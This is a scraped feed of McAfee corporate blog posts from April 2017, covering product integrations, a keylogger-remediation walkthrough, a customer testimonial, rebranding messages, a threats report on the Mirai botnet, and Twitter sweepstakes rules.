UEBA solution integrations with both the McAfee Enterprise Security Manager SIEM solution and the McAfee Data Exchange Layer threat intelligence sharing fabric can identify indicators of attack and feed those back into the SIEM to facilitate threat hunting. False positives are minimized, and analysts can focus on high-priority actionable items. In effect, these integrations create a closed-loop system, with continuous interaction between the products. Integration with McAfee Data Exchange Layer enables and accelerates communication of threat intelligence across multiple security solutions. This can dramatically speed detection and remediation across the entire enterprise security ecosystem, supporting the entire threat lifecycle.

Learn more about how McAfee Enterprise Security Manager can be leveraged to perform UEBA functions in our white paper, Entity Behavior Analytics for McAfee Enterprise Security Manager. Also, explore the UEBA vendors who are part of the McAfee Security Innovation Alliance.

The post The Power of an Integrated UEBA/SIEM Solution appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/power-integrated-uebasiem-solution/feed/ 0
For CGI, Protect-Detect-Correct Strategy Stands Out in McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/for-cgi-protect-detect-correct-strategy-stands-out-in-mcafee-endpoint-security/ https://securingtomorrow.mcafee.com/business/for-cgi-protect-detect-correct-strategy-stands-out-in-mcafee-endpoint-security/#respond Thu, 13 Apr 2017 16:37:33 +0000 https://securingtomorrow.mcafee.com/?p=71624 “What I love about McAfee is the protect-detect-correct strategy,” says Infrastructure Architect Niels Benders of CGI, a Montreal, Canada-based global IT consulting and outsourcing company with 55,000 endpoints in 30 countries. “[That strategy] works out smoothly in the latest version [10.5] of McAfee Endpoint Security.” The ‘Protect-Detect-Correct’ strategy Benders refers to is the essence of […]

The post For CGI, Protect-Detect-Correct Strategy Stands Out in McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
“What I love about McAfee is the protect-detect-correct strategy,” says Infrastructure Architect Niels Benders of CGI, a Montreal, Canada-based global IT consulting and outsourcing company with 55,000 endpoints in 30 countries. “[That strategy] works out smoothly in the latest version [10.5] of McAfee Endpoint Security.”

The ‘Protect-Detect-Correct’ strategy Benders refers to is the essence of a successful Threat Defense Lifecycle—namely, the ability to effectively block threats, quickly identify compromises, and expedite remediation when needed. Bender intuitively grasps how McAfee Endpoint Security (ENS) does all three of these critical actions to help simplify the Threat Defense Lifecycle:

Protect. With an integrated firewall, updated web filtering, and more advanced threat protection, McAfee ENS protects CGI endpoints from botnets, distributed denial-of-service (DDoS) attacks, advanced persistent threats, and risky web connections. In addition, the Dynamic Application Containment (DAC) feature in ENS can analyze and take action against greyware and other emerging malware, quarantining them at patient zero to prevent infection.

Detect. The Real Protect functionality available in ENS 10.5 uses machine-learning behavior classification to improve detection and discover stealthy zero-day malware. By automatically evolving behavior classification to identify behaviors and adding rules to identify future attacks that are similar, Real Protect also speeds future detection. Furthermore, since ENS is built to communicate using the McAfee Data Exchange Layer (DXL) fabric, it can, via McAfee Threat Intelligence Exchange, to share near real-time threat information with other local and global security systems and resources, such as the company’s McAfee Web Gateway appliances, to detect new and emerging threats.

Correct. “Within three clicks, you can find the [infected] system, investigate the system, and respond,” says Benders, whose enterprise team delivers endpoint protection to both internal and external customers. In short, for remediation “[McAfee ENS] saves time.”

In addition to endpoint protection, CGI counts on McAfee to protect its users from web-borne attacks wherever they are with McAfee Web Gateway appliances and McAfee Web Gateway Cloud Service. Thanks to the McAfee Client Proxy (MCP), CGI users and consultants are protected by the same CGI corporate security policies whether they access the Internet behind the corporate firewall or at home or at Starbucks.

All of CGI’s McAfee endpoint and web protection solutions are managed using the web-based McAfee ePolicy Orchestrator (ePO) console. Benders loves having a single pane of glass to manage multiple products and an integrated solution in which “everything works so well together.”

Watch a brief video of Benders talking about his experience with McAfee and find out what his favorite McAfee product is.

Get your questions answered by tweeting @McAfee_Business

The post For CGI, Protect-Detect-Correct Strategy Stands Out in McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/for-cgi-protect-detect-correct-strategy-stands-out-in-mcafee-endpoint-security/feed/ 0
How Coordinated, Collaborative Security Can Help You Defeat Unknown Malware https://securingtomorrow.mcafee.com/business/security-operations/coordinated-collaborative-security-can-help-defeat-unknown-malware/ https://securingtomorrow.mcafee.com/business/security-operations/coordinated-collaborative-security-can-help-defeat-unknown-malware/#respond Wed, 12 Apr 2017 19:00:51 +0000 https://securingtomorrow.mcafee.com/?p=71001 This blog was written by Stan Golubchik. In a previous blog, “How to Gain a Competitive Advantage with an Integrated Approach to Security,” we’ve shown you how adding an advanced threat analysis technology to a large enterprise security ecosystem is contributing to its success both operationally and from a business perspective. This time, we’ll step […]

The post How Coordinated, Collaborative Security Can Help You Defeat Unknown Malware appeared first on McAfee Blogs.

]]>
This blog was written by Stan Golubchik.

In a previous blog, “How to Gain a Competitive Advantage with an Integrated Approach to Security,” we’ve shown you how adding an advanced threat analysis technology to a large enterprise security ecosystem is contributing to its success both operationally and from a business perspective.

This time, we’ll step through the technical details of how to combat unknown malware in a typical enterprise environment. Let’s look at a company that has just gone through an acquisition. As a result of the acquisition, employees are being required to use many new applications. One of the employees clicks a link in an email for an application that appeared legitimate but is, in fact, malicious and installs a keylogger that captures users’ keystrokes.

Here’s how the McAfee integrated ecosystem approach to security rapidly responds to unknown files of this kind and prevents them from executing and doing damage across the organization.

Step 1:

McAfee Threat Intelligence Exchange discovers the keylogger on endpoints and blocks the file from executing. The Threat Intelligence Exchange client then queries the McAfee Threat Intelligence Exchange server on file reputation and simultaneously queries McAfee Global Threat Intelligence, which gathers file reputation intelligence from millions of sensors all over the world. The file is cached on the server while McAfee Threat Intelligence Exchange checks its blacklist and whitelist. After this query-response process, McAfee Threat Intelligence can update the reputation as “good” or “bad.” However, in this case, the file is unknown and requires further analysis.

McAfee Advanced Threat Defense combines sandboxing dynamic code analysis with in-depth static code analysis to identify any potentially malicious code.

Step 2:

Through REST API, McAfee Threat Intelligence communicates with McAfee Advanced Threat Defense, where the unknown file is sent for further analysis via sandboxing. McAfee Advanced Threat Defense spins up a virtual machine (VM) to detonate the file via dynamic analysis, which enables examination of any malicious behavior. At the same time, McAfee Advanced Threat Defense will perform static code analysis by unpacking the file and reverse engineering the code, allowing comparison to known malware families leveraging code reuse and identifying any potentially malicious code. Obfuscated and metamorphic code, which can be highly evasive, can be unveiled through the combination of dynamic and static code analysis. If any malicious intent is identified, McAfee Advanced Threat Defense then convicts the file and updates the reputation, applying a high-severity rating, in this case. This process reveals several indicators of compromise (IoCs) about the file: it attempts to bypass security controls, it installs a keylogger, and it makes connections to risky websites. The file is then sent back to the McAfee Threat Intelligence Exchange server, which updates its local repository and any integrated vector from endpoint to network. McAfee Advanced Threat Defense will also publish IoCs across the McAfee Data Exchange Layer (McAfee DXL), to any subscriber. 

Step 3:

McAfee Data Exchange Layer, which enables sharing of threat information across McAfee security components and third-party security products, publishes these IoCs for ingestion by other solutions in the environment.

Step 4:

McAfee Data Exchange Layer will publish IoCs generated from McAfee Advanced Threat Defense to the security information and event management system (SIEM), McAfee Enterprise Security Manager. The SIEM then aggregates the IoCs and correlates these events. For example, it can do historic investigation, looking into its archives of networks or systems to find evidence of this malware and correlate these IoCs with other events. If it finds that systems have connected to malicious URLs associated with the keylogger, it can send out additional alerts so that remediation can be applied. Once the correlation has been done, McAfee Endpoint Threat Defense and Response uses its automated search capability to get access to this information and generates a URL that will open up the McAfee ePolicy Orchestrator (McAfee ePO) management console where McAfee Active Response is housed, and the pivot to remediation can take place.

Step 5:

Since the malware has a high-severity rating, McAfee Enterprise Security Manager triggers an alert, which enables the administrator to take remediation actions, such as killing the process or removing the file—along with any trace files—from the affected machines.

This use case illustrates the value of a unified architecture, where collaboration of all your security components can dramatically improve security operation response and efficiency, reduce threat dwell time, and increase your capacity to handle security events. In a recent McAfee survey, 70% of participants believe that this approach results in reduction of manual efforts through integrated workflows and automation and 65% believe it provides more effective triage automation.

Watch our video, and see the power of McAfee integration and intelligence sharing in action: “Defeat the Grey.”

The post How Coordinated, Collaborative Security Can Help You Defeat Unknown Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/coordinated-collaborative-security-can-help-defeat-unknown-malware/feed/ 0
Tearing Down Walls as the New McAfee https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/tearing-walls-new-mcafee/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/tearing-walls-new-mcafee/#respond Wed, 12 Apr 2017 15:00:30 +0000 https://securingtomorrow.mcafee.com/?p=71433 This blog was written by Jason Grier. As we embark on our journey as a new company, we look towards our goals to help guide us along the way. Our north star? Collaboration. We want to tear down walls, because we know that we’re stronger together. But in order to do this, we first have […]

The post Tearing Down Walls as the New McAfee appeared first on McAfee Blogs.

]]>
This blog was written by Jason Grier.

As we embark on our journey as a new company, we look towards our goals to help guide us along the way. Our north star? Collaboration. We want to tear down walls, because we know that we’re stronger together. But in order to do this, we first have to take the right steps to get there, including opening up the dialogue with our customers that keeps education a top priority, and supporting each other internally. And with those acting as our guide posts, the new McAfee can continue to succeed in ensuring safety for all.

Listening to Our Customers

As the new McAfee, our defined position in the market will help us continue our strong communication and collaboration with our customers. An open dialogue is crucial for customer success, so it’s important that we continue to build out a unique and personal experience. That means we’re going to strengthen the listening posts we have for every point of the customer journey, so they feel supported while they navigate the cybersecurity landscape. We’re also now going to set up resources in a centralized fashion to approach customer response with a data-driven method. That way, we can capture the similarities we hear from customers and make them into something actionable, which in turn allows us to provide a more immediate and direct fix to the problem.
The good news is: this has already started to become second nature to us because of the precedent Chris Young has set. When it comes to listening to customers and taking action, he truly leads by example. He’s completely customer-facing, he listens to issues, meets regularly, and most importantly, he sets clear expectations around taking action on what people are saying.
He reminds us that a customer’s journey needs to be strategic, which means we also need to begin the customer journey with a strategy, as well. That’s where strong cybersecurity education comes into play.

Keeping Education Top of Mind

We are in an industry that is charged with securing the lives of people who are dealing with complex problems. And unfortunately, a lot of our customers want to fully understand the problems they’re facing, but can’t.

Therefore, these customers are relying on us to tell them what they don’t know, and more importantly, what they need to do to stay safe.

That’s why the new McAfee is focused on making things simple, smooth, and easy for customers to understand. We want to break cybersecurity down in a way our customers can easily grasp and translate to their own lives. That way, cybersecurity becomes less intimidating and just second nature to them. To accomplish that, we’re going to constantly stay one step ahead by knowing what threats and technologies are on the horizon.

Teamwork Like Never Before

As the new McAfee, we’re experiencing a culture shift that’s allowing us to streamline and optimize our efforts as a team.  We’re now better supporting each other, using everyone to the best of their ability, and keeping everyone accountable for their actions. The result? Teamwork like we’ve never seen before.

That’s because we know this is all of our responsibility, and with that responsibility comes a sense of pride and ownership that is engrained in the fabric of McAfee. We’re proud that we get to positively impact so many lives, and we’re proud we can do that as a McAfee employee.

When you meet a McAfee employee, any employee, you see this sort of blue collar mentality that drives the way they work. Everyone is ready to get their hands dirty, do what they have to do to get it fixed, and get it right. We’re doers, and our customers know that. In fact, they’re counting on it.

Join the conversation about #newMcAfee! Tweet to us at @McAfee and @McAfee_Home

The post Tearing Down Walls as the New McAfee appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/tearing-walls-new-mcafee/feed/ 0
Leveraging SIEM and Security Analytics for Improved Monitoring of Advanced Threats https://securingtomorrow.mcafee.com/business/security-operations/leveraging-siem-security-analytics-improved-monitoring-advanced-threats/ https://securingtomorrow.mcafee.com/business/security-operations/leveraging-siem-security-analytics-improved-monitoring-advanced-threats/#respond Fri, 07 Apr 2017 19:00:40 +0000 https://securingtomorrow.mcafee.com/?p=71166 This blog post was written by Karl Klaessig. For more than a decade, in response to higher volumes of alerts, security information and event monitoring (SIEM) became an integral component of enterprise security programs. However, the increasing sophistication and complexity of attacks are driving the need for advanced analytics—beyond the log aggregation of older SIEM […]

The post Leveraging SIEM and Security Analytics for Improved Monitoring of Advanced Threats appeared first on McAfee Blogs.

]]>
This blog post was written by Karl Klaessig.

For more than a decade, in response to higher volumes of alerts, security information and event monitoring (SIEM) became an integral component of enterprise security programs. However, the increasing sophistication and complexity of attacks are driving the need for advanced analytics—beyond the log aggregation of older SIEM solutions. Security analytics, which uses Big Data technologies, has emerged to fill in the gaps.

In its recent report, “Security Analytics Team of Rivals,” consulting firm Securosis contends that security analytics solutions provide maximum value when integrated with advanced SIEM solutions and vice versa. One is not a replacement for the other, nor should they be viewed as competing solutions.

Most enterprises have had a SIEM in place for a number of years. Its main strengths include: data aggregation, correlation, forensics and incident response, and reporting. The data sets that are generally handled best by a SIEM are network data, endpoint activity, server and data logs and change control activity, identity data, application logs, and threat intelligence feeds.

One thing that some SIEMs struggle with is finding patterns in large volumes of data. Security analytics solutions, on the other hand, are intentionally designed to crunch through SIEM’s huge data sets, looking for indicators of malicious activity, such as anomalous patterns of activity, misconfiguration, or privilege escalation. The integrated solutions are particularly good at advanced threat detection and tracing insider attacks.

How do you benefit from integrating analytics solutions with your SIEM? For one thing, today’s security analytics solutions don’t allow you to search for an alert and then set in motion an incident response process—SIEMs handle that job and lend themselves well to easy and comprehensive threat activity visualizations and reporting. There are two key integration points where you’ll find the combination invaluable:

  • Automated Data Analysis: SIEMs have been proficient at collecting and aggregating data for a long time. In order to extract this data for further analysis, ensure that your integration of SIEM and security analytics has sufficiently robust automated processes. This can save an enormous amount of time.
  • Alert Prioritization: Both your SIEM and your security analytics tools will create and send out alerts. Bi-directional information sharing between the SIEM and security analytics solutions is essential so that your team can prioritize investigative actions and maintain context.

Let’s look at a scenario where SIEM and security analytics can complement one another to detect what appears to be an advanced insider attack. In this use case, the security team of a fast-growing retail operation receives an alert from its SIEM solution. It appears that an insider is probing the internal network, which is highly unusual activity for an employee. For a more complete picture of the situation, the team accesses its integrated SIEM and security analytics solution for additional insights on what the adversary is up to. The integrated investigation reveals several types of unusual activity—like privilege escalations and configuration changes on multiple devices. The SIEM reports the trajectory of the attacker, which results in compromise of the device that triggered the alert in the first place, and this enables smarter and faster remediation.

To learn more about how your SIEM and security analytics tool can coordinate and complement each other, read the Securosis report, “Security Analytics Team of Rivals.”

The post Leveraging SIEM and Security Analytics for Improved Monitoring of Advanced Threats appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/leveraging-siem-security-analytics-improved-monitoring-advanced-threats/feed/ 0
How Working Together Accelerates Our Evolution https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/working-together-accelerates-evolution/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/working-together-accelerates-evolution/#respond Thu, 06 Apr 2017 15:00:47 +0000 https://securingtomorrow.mcafee.com/?p=71050 This blog post was written by Vincent Weafer. It is no secret that the end goal for cybersecurity companies is to battle cyber-threats & cyber-attackers in order keep their customers assets and data safe.  Easy, right? Well, the problem is that defenders must move faster than the attackers, than the changes in the underlying technologies […]

The post How Working Together Accelerates Our Evolution appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

It is no secret that the end goal for cybersecurity companies is to battle cyber-threats & cyber-attackers in order keep their customers assets and data safe.  Easy, right? Well, the problem is that defenders must move faster than the attackers, than the changes in the underlying technologies evolve, and faster than the power of tools used by the attackers.  That is extremely difficult to achieve if you try and do it by yourself in isolation, no matter your size or skills.  Today’s cybersecurity juggernauts have tried to go about this in silos, which slows innovation in an industry that needs to evolve faster than the cybercriminals.

We’ve innovated in silos too. But no longer. With the launch of the new McAfee, we believe that #TogetherIsPower and are focusing on better collaboration to more quickly unlock the potential in our company and in the industry.

This collaboration comes in two forms: uniting across the industry in the fight against cybercrime and working together with our customers to better understand how to protect them. Both result in stronger, more innovative ideas, and ultimately, in better solutions to tricky security challenges.

Uniting the White Hat Fight

Silos have left the cybersecurity industry out of breath as it chases after inventive cybercriminals, desperate to catch up to their newest malicious innovations. And though partnerships like the Cyber Threat Alliance and technologies like McAfee Open DXL are great first steps, they’re just the beginning of an important movement. That’s where the new McAfee comes in: our new company allows us the freedom and agility to share knowledge, utilize the entire cybersecurity ecosystem to our advantage, and expand on existing partnerships and programs. There’s a difference in execution speed as well, since the new McAfee can now forge new partnerships at a faster rate than ever before – giving us a better chance at quickly tackling the newest cyber threats. Through these partnerships, white hats will begin to catch up with black hats.

Finding Strength in an Open Dialogue

Collaboration will also be a cornerstone of our customer relationships.

Our customers are the driving force behind our innovation, so it is critical that we understand their security challenges and where they see cybersecurity risks. Deeper dialogs will help generate new ideas, build stronger solutions, and solve problems more effectively.

Driving Evolution Forward

It is this dedication to collaboration – within the industry and with our customers – that defines what the new McAfee stands for as a company. We are excited about the new McAfee: a company that continues to grow, change and adapt; one that works endlessly to create better ideas, better products and better security.

For more information, follow us at @McAfee_Labs and @McAfee, and join the conversation with #TogetherIsPower

The post How Working Together Accelerates Our Evolution appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/working-together-accelerates-evolution/feed/ 0
McAfee Labs Threats Report Explores Threat Intelligence Sharing and Mirai, the IoT Botnet https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-threat-intelligence-sharing-mirai-iot-botnet/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-threat-intelligence-sharing-mirai-iot-botnet/#respond Thu, 06 Apr 2017 04:01:46 +0000 https://securingtomorrow.mcafee.com/?p=71037 This blog post was written by Vincent Weafer. In the McAfee Labs Threats Report: April 2017, published today, we explore two key topics. Following an announcement by the Cyber Threat Alliance of its formal incorporation and the release of a threat intelligence sharing platform, we provide some perspective about threat intelligence sharing. The story provides a […]

The post McAfee Labs Threats Report Explores Threat Intelligence Sharing and Mirai, the IoT Botnet appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

In the McAfee Labs Threats Report: April 2017, published today, we explore two key topics.

Following an announcement by the Cyber Threat Alliance of its formal incorporation and the release of a threat intelligence sharing platform, we provide some perspective about threat intelligence sharing. The story provides a detailed analysis of the background and drivers of threat intelligence sharing, the various components of threat intelligence and its sources, how mature security operations can use this information, five critical challenges that need to be overcome, and the evolving sharing models that have appeared in the market.

To move threat intelligence sharing to the next level of efficiency and effectiveness, the story explains why improvement is needed in three areas:

  • We need to simplify event triage and provide a better environment for security practitioners to investigate high-priority threats.
  • We need to do a better job establishing relationships between indicators of compromise so that we can understand their connections to attack campaigns.
  • We need a better way to share threat intelligence among our own products and with other vendors.

You can learn about integrating threat intelligence in McAfee environments by reading the Operationalizing Threat Intelligence solution brief.

***

On October 21, 2016, the domain name service company Dyn was attacked with a massive and complex distributed denial-of-service attack. At its peak, Dyn was flooded by 1.2Tbps of traffic, the highest volume of DDoS traffic ever recorded. The analysis of the attack confirmed that the DDoS traffic originated from Internet of Things devices infected by the Mirai botnet.

In our second story, we examine the Mirai botnet, including its architecture and inner workings; its attack process, including the many attack vectors it can use to flood targets; and its evolution.

During our analysis of Mirai, we set up a honeypot masquerading as an unprotected, publicly accessible IoT device to see if we could attract a Mirai incursion. In fewer than five minutes, we registered the first attempted attack. Watch the video of the honeypot console, showing how quickly the simulated IoT device was discovered and attacked.

You can learn how to secure IoT devices and how McAfee products can protect systems and networks from IoT device attacks by reading the Secure IoT Devices to Protect Against Attacks solution brief.

***

Finally, we provide rich statistical detail about Q4 threat activity. Here are some highlights:

  • The number of new malware samples in Q4—23 million—dropped 17% from Q3. However, the overall count grew 24% in 2016 to 638 million samples.
  • The number of new ransomware samples fell 71% in Q4, mostly due to a drop in generic ransomware detections, as well as a decrease in Locky and CryptoWall. The number of total ransomware samples grew 88% in 2016.
  • Mobile malware. The number of new mobile malware samples declined by 17% in Q4. But total mobile malware grew 99% in 2016.
  • Mac OS malware. Although still small compared with Windows threats, the number of new Mac OS malware samples grew 245% in Q4, due to adware bundling. Total Mac OS malware grew 744% in 2016.
  • We counted 197 publicly disclosed security incidents in Q4 and 974 publicly known security incidents in 2016.

The McAfee Labs Threats Report: April 2017 is available here.

The post McAfee Labs Threats Report Explores Threat Intelligence Sharing and Mirai, the IoT Botnet appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-threat-intelligence-sharing-mirai-iot-botnet/feed/ 0
Help Us Celebrate #newMcAfee Re-Tweet to Win! https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/ https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/#comments Wed, 05 Apr 2017 12:00:20 +0000 https://securingtomorrow.mcafee.com/?p=70937 Today is a new day, and a new company: Intel Security has officially rebranded to McAfee, and because we’re so excited about this change, we’re using it as an excuse to give YOU the chance to win some prizes. The Details: With this new brand comes a new era of security, with the aim to […]

The post Help Us Celebrate #newMcAfee Re-Tweet to Win! appeared first on McAfee Blogs.

]]>
Today is a new day, and a new company: Intel Security has officially rebranded to McAfee, and because we’re so excited about this change, we’re using it as an excuse to give YOU the chance to win some prizes.

The Details:

With this new brand comes a new era of security, with the aim to protect people in our increasingly connected world.  We’re spreading this message on social, on streamlined handles to account for the new brand.

So, as of today make sure you follow us on @McAfee to get all future updates. 

How to Enter:

And to kick off this new ear of McAfee, we are hosting a “retweet to win” social Sweepstakes throughout the month of April.

On @Mcafee_Business, @McAfee_Home and @McAfee, Re-Tweet any tweets with this image (including #sweeps) and follow @McAfee for your chance to win. If you successfully complete each step, you’ll be entered for a chance to win a $50 Amazon Gift card. We’ll choose winners at random each Friday.

We’re giving away six $50 Gift Cards!

To Recap:

  • Starting April 4th, Intel Security will be rebranded to McAfee
  • On Twitter, whenever you see the above image, Re-tweet (include #sweeps) and follow @McAfee to be entered to win a $50 Amazon Gift Card
  • We’re giving away 6 Gift Cards, so that’s more chances to win if you enter every week
  • We’ll be announcing the winners via @McAfee and DM every Friday for the duration of the Sweepstakes, starting April 14th.
  • We will randomly select winners and will announce them on April 14th, 21st, and 28th.

 

Make sure to join the conversation on Twitter with #newMcAfee!

For full Sweepstakes details, please see the Official Rules below.  By participating in this Sweepstakes you agree to be bound by the Official Rules and represent that you satisfy all of the eligibility requirements.

 

Intel Security Rebrand Social RT to Win Sweepstakes  Official Rules

 

NO PURCHASE NECESSARY.  VOID WHERE PROHIBITED BY LAW.  SUBJECT TO APPLICABLE FEDERAL, STATE AND LOCAL LAWS.

  1.   How to enter: Intel Security Rebrand Social RT to Win Sweepstakes will be conducted between April 4, 2017 and April 27, 2017.  All entries for each period of the Rebrand Social RT to Win Sweepstakes must be received during the dates and times specified below to be entered into the corresponding drawing.  Pacific Daylight Time shall control. One winner will be chosen at random for each of the first two sweepstakes entry periods and four winners will be chosen at random for the final entry period.   The Rebrand Social RT to Win Sweepstakes entry periods are as follows:
  • Entry Periods and Winner Selection Dates:
  • Tuesday April 4th 9:00am –  Thursday April 13 6:00pm PT
    • One Winner announced: Friday April. 14th @10:00am PT
  • Friday, April 14 11:00am –  Thursday April 20th 6:00pm PT
    • One Winner announced: Friday April. 21st @10:00am PT
  • Friday, April 21 9:00am –  Thursday April 27 6:00pm PT
    • Four Winners announced: Friday April. 28th @12:00pm PT

On each of the days listed above, there will be a tweet from @McAfee_Business, @McAfee_Home or @McAfee with a graphic and social copy instructing participants to enter the Sweepstakes. 

For each tweet from McAfee, participants must complete the following steps during the entry periods specified above:

  1. Retweet a Sweepstakes tweet from any @McAfee affiliated Twitter account with the tag #sweepstakes in your entry
  2. Participant must also follow @McAfee to be considered

No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win once.

  1.   Eligibility:The Sweepstakes is open only to all people who are 18 years of age or older on the date the Rebrand Social RT to Win Sweepstakes begins, who are legal residents of the 50 United States or District of Columbia. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

IF YOU DO NOT MEET ANY OF THESE REQUIREMENTS, OR ANY OTHER ELIGIBILITY REQUIREMENTS IN THESE OFFICIAL RULES, YOU ARE NOT ELIGIBLE TO WIN A PRIZE.  To be eligible to win a prize, entries must be completed and received by Sponsor in the manner and format designated below.  SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

  1. Winner Selection: Six (6) total winners, one (1) for each of the first two weeks of the Rebrand Social RT to Win Sweepstakes, and four (4) selected the third week will be chosen from the eligible entries received during each of the Rebrand Social RT to Win Sweepstakes periods. Participants will only be eligible to win once. By participating, entrants agree to be bound by the Official Rebrand Social RT to Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1.   Prizes: The prize for each Rebrand Social RT to Win Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD). Total ARV of all prizes is $300 (6 Amazon Gift Cards).

Entrants agree that Sponsor has the sole right to determine the winners of the Rebrand Social RT to Win Sweepstakes and all matters or disputes arising from the Rebrand Social RT to Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1.   General conditions: Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor, Twitter, and any of their respective parent companies is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the Rebrand Social RT to Win Sweepstakes, or by any technical or human error, which may occur in the processing of the Rebrand Social RT to Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Rebrand Social RT to Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any Rebrand Social RT to Win Sweepstakes-related activity, or participation in the Rebrand Social RT to Win Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Rebrand Social RT to Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Rebrand Social RT to Win Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the Rebrand Social RT to Win Sweepstakes and all matters or disputes arising from the Rebrand Social RT to Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law Each Prize Rebrand Social RT to Win Sweepstakes and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy Personal information obtained in connection with this prize Rebrand Social RT to Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

 

Limitations of Liability; Releases:  By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory. 

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10.  THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.   

Use of Use of Winner’s Name, Likeness, etc.:  Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.  By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

